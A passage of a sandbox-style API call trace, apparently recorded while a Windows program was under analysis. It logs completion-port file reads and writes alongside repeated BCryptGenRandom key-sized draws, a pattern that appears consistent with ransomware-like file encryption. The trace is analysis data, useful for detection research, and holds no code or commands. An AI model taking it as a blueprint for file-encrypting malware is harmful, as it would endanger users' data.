lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.946] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0120.963] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.050] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5f39, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.051] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.052] CloseHandle (hObject=0x2f4) returned 1 [0121.052] free (_Block=0x1ff1e60) [0121.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.067] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0121.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0121.068] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.068] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.068] free (_Block=0x3e305b8) [0121.068] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.068] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.069] free (_Block=0x1fa91d0) [0121.069] free (_Block=0x77d7a8) [0121.069] free (_Block=0x1fa90b8) [0121.069] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0121.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0121.077] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.077] free (_Block=0x3e305b8) [0121.077] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.077] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.078] free (_Block=0x1fa91d0) [0121.078] free (_Block=0x77d7a8) [0121.078] free (_Block=0x1fa90b8) [0121.078] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.080] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.090] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x11e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.091] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0121.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0121.106] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.106] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.106] free (_Block=0x3e305b8) [0121.106] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.106] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.107] free (_Block=0x1fa91d0) [0121.107] free (_Block=0x77d7a8) [0121.107] free (_Block=0x1fa90b8) [0121.107] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0121.107] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0121.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0121.223] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.223] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.223] free (_Block=0x3e305b8) [0121.223] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.223] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.223] free (_Block=0x1fa91d0) [0121.223] free (_Block=0x77d7a8) [0121.224] free (_Block=0x1fa90b8) [0121.224] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.224] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.225] CloseHandle (hObject=0x308) returned 1 [0121.225] free (_Block=0x3d70450) [0121.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.225] WriteFile (in: hFile=0x2f4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x65f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0121.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.376] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1bf2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.377] CloseHandle (hObject=0x2f4) returned 1 [0121.377] free (_Block=0x1ff1e60) [0121.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0121.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0121.387] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0121.387] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0121.387] free (_Block=0x3e305b8) [0121.387] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0121.387] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0121.388] free (_Block=0x1fa91d0) [0121.388] free (_Block=0x77d7a8) [0121.388] free (_Block=0x1fa90b8) [0121.388] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.389] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0121.402] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5754, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.160] CloseHandle (hObject=0x13c0) returned 1 [0124.160] free (_Block=0x1ff1e60) [0124.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.168] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.168] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.169] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.169] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.169] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.170] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.170] free (_Block=0x3e305b8) [0124.170] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.170] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.170] free (_Block=0x1fa91d0) [0124.170] free (_Block=0x77d7a8) [0124.170] free (_Block=0x1fa90b8) [0124.170] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0124.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.179] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.179] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.179] free (_Block=0x3e305b8) [0124.179] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.179] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.180] free (_Block=0x1fa91d0) [0124.180] free (_Block=0x77d7a8) [0124.180] free (_Block=0x1fa90b8) [0124.180] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0124.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.189] CloseHandle (hObject=0x2f4) returned 1 [0124.189] free (_Block=0x3df0008) [0124.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.197] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5fd0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0124.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.212] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.212] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.212] free (_Block=0x3e305b8) [0124.212] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.212] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.212] free (_Block=0x1fa91d0) [0124.212] free (_Block=0x77d7a8) [0124.212] free (_Block=0x1fa90b8) [0124.212] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.217] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0124.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.226] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.226] free (_Block=0x3e305b8) [0124.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.226] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.226] free (_Block=0x1fa91d0) [0124.226] free (_Block=0x77d7a8) [0124.226] free (_Block=0x1fa90b8) [0124.226] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.237] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.237] free (_Block=0x3e305b8) [0124.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.237] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.238] free (_Block=0x1fa91d0) [0124.238] free (_Block=0x77d7a8) [0124.238] free (_Block=0x1fa90b8) [0124.238] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0124.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.248] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xab80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.251] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.251] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.251] free (_Block=0x3e305b8) [0124.251] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.251] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0124.251] free (_Block=0x1fa91d0) [0124.251] free (_Block=0x2071c20) [0124.251] free (_Block=0x1fa90b8) [0124.251] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.254] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8ada, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.256] GetQueuedCompletionStatus 